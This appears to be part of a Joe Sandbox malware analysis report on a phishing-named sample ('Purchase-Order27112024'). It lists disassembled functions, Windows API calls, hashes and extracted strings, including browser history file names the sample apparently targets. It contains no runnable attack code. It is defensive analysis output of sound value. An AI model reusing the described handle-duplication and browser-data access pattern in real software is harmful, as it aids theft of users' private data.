                                                                                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                        • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                      • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                      • String ID:
                                                                                                      • API String ID: 1979745280-0
                                                                                                      • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                      • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                      APIs
                                                                                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                      • free.MSVCRT ref: 00418803
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1355100292-0
                                                                                                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                      • memset.MSVCRT ref: 00403A55
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                      • String ID: history.dat$places.sqlite
                                                                                                      • API String ID: 2641622041-467022611
                                                                                                      • Opcode ID: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                      • Opcode Fuzzy Hash: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                      APIs
                                                                                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                      • GetLastError.KERNEL32 ref: 00417627
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$File$PointerRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 839530781-0
                                                                                                      • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                      • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst
                                                                                                      • String ID: *.*$index.dat
                                                                                                      • API String ID: 1974802433-2863569691
                                                                                                      • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                      • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156039329-0
                                                                                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                      • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                      • String ID:
                                                                                                      • API String ID: 3397143404-0
                                                                                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                      APIs
                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 1125800050-0
                                                                                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                      APIs
                                                                                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                      • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleSleep
                                                                                                      • String ID: }A
                                                                                                      • API String ID: 252777609-2138825249
                                                                                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                      APIs
                                                                                                      • malloc.MSVCRT ref: 00409A10
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                      • free.MSVCRT ref: 00409A31
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: freemallocmemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3056473165-0
                                                                                                      • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                      • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: d
                                                                                                      • API String ID: 0-2564639436
                                                                                                      • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                      • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: BINARY
                                                                                                      • API String ID: 2221118986-907554435
                                                                                                      • Opcode ID: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                      • Opcode Fuzzy Hash: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp
                                                                                                      • String ID: /stext
                                                                                                      • API String ID: 2081463915-3817206916
                                                                                                      • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                      • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp
                                                                                                      • String ID: .#v
                                                                                                      • API String ID: 2081463915-507759092
                                                                                                      • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                      • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                      APIs
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                      • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2445788494-0
                                                                                                      • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                      • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: malloc
                                                                                                      • String ID: failed to allocate %u bytes of memory
                                                                                                      • API String ID: 2803490479-1168259600
                                                                                                      • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                      • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                      • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                      • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0041BDDF
                                                                                                      • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
